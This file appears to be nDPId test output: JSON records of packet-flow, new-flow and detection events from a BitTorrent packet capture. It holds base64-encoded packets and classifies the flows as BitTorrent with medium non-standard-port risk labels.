00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"}
01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"}
01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="}
00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="}
01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="}
01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="}
00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="}
01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="}
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="}
01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="}
